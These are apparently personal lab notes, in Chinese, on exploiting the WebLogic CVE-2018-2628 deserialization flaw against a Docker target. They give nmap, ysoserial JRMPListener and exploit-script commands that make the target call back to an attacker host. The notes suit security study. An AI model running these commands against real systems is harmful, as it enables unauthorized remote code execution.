环境搭建
weblogic靶机:
docker pull zhiqzhao/ubuntu_weblogic1036_domain
docker images
docker run -d -p7001:7001 zhiqzhao/ubuntu_weblogic1036_domain
攻击的服务器:
java + python2环境即可
docker学习笔记: https://www.evernote.com/shard/s461/sh/bc38ea4c-3bfe-4321-ab3c-1742f69998e4/4e371b210ab3b23e9df415f54dadaabb
漏洞利用
在windows上执行exploit,返回数据二进制会在cmd中报错,但是命令是可以执行成功的,Linux下是没有报错的。
攻击机执行命令:
nmap -sV --script=weblogic-t3-info -Pn 120.77.253.216 -p7001
wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/zhenxin'
python cve-2018-2628.py 120.77.253.216 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 122.152.233.180 1099 JRMPClient2
漏洞原理
明天补。
参考文章
https://blog.csdn.net/archersaber39/article/details/80135463#t0